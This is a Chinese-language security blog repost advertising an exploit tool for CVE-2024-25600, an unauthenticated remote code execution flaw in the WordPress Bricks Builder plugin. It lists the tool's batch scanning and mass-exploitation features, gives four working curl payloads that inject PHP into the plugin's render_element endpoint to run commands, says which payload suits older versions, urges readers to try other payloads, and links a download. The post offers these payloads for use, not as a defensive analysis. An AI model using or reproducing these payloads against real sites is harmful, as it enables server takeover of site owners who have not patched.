CVE-2024-25600 漏洞利用工具

admin 2024年3月2日17:48:53评论32 views字数 1593阅读5分18秒阅读模式

工具描述

该工具旨在利用 WordPress Bricks Builder 插件中发现的 CVE-2024-25600 漏洞。该漏洞允许在受影响的网站上未经身份验证的远程代码执行。该工具通过检索随机数并发送特制请求来执行任意命令,从而自动化利用过程。
工具特点

互动模式:与目标网站实时互动🕹️。批处理模式:扫描并利用列表中的多个网站📋。命令执行:在目标服务器上执行任意命令⚙️。有效负载定制:选择不同的有效负载进行利用,包括generic、carousel、container和code🧰。RCE确认:仅显示和记录已确认RCE的URL的选项✔️。
CVE-2024-25600 漏洞利用工具

图片来源:大仙安全说

概念验证 (PoC) 

本公开提供的基础PoC如下:

第一个概念验证:

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element -H "Content-Type: application/json" -d '{  "postId": "1",  "nonce": "[NONCE]",  "element": {    "name": "container",    "settings": {      "hasLoop": "true",      "query": {        "useQueryEditor": true,        "queryEditor": "throw new Exception(`id`);",        "objectType": "post"      }    }  }}'

第二个概念验证:

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element   -H "Content-Type: application/json"   -d '{  "postId": "1",  "nonce": "[NONCE]",  "element": {    "name": "carousel",    "settings": {      "type": "posts",      "query": {        "useQueryEditor": true,        "queryEditor": "throw new Exception(`id`);",        "objectType": "post"      }    }  }}'

第三个概念验证:

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element   -H "Content-Type: application/json"   -d '{  "postId": "1",    "nonce": "[NONCE]",  "element": "1",  "loopElement": {    "settings": {      "query": {        "useQueryEditor": "",        "queryEditor": "throw new Exception(`id`);"      }    }  }}'

第四个概念验证(对旧版本有效):

curl -k -X POST "http://[HOST]/index.php?rest_route=/bricks/v1/render_element" -H "Content-Type: application/json" -d '{  "postId": "1",  "nonce": "[NONCE]",  "element": {    "name": "code",    "settings": {      "executeCode": "true",      "code": "<?php throw new Exception(`id`);?>"    }  }}'

注意:第四个 PoC 对于旧版本的 Bricks Builder(在版本 1.8 上测试)特别有效,以前的 PoC 可能不起作用。

额外的有效负载可能会产生更好的结果。如果我的漏洞利用或概念验证对您不起作用,我鼓励您尝试其他有效负载以找到更有效的解决方案。

下载地址

https://github.com/Chocapikk/CVE-2024-25600

原文始发于微信公众号(Hack分享吧):CVE-2024-25600 漏洞利用工具

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月2日17:48:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-25600 漏洞利用工具http://cn-sec.com/archives/2541027.html

发表评论

匿名网友 填写信息